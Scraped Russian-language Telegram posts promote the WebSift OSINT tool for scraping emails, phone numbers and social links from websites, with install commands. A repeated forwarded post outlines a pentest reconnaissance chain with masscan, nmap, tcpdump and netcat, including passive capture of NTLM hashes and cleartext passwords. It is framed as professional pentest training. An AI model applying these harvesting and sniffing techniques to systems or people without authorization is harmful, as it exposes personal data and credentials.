WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git
cd WebSift/
cd WebSift/
bash websift.sh
#web #pentest #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
🔍 80% успешных атак рождаются до запуска эксплойта
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
--rate=1000 — иначе положишь клиентскую сеть2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/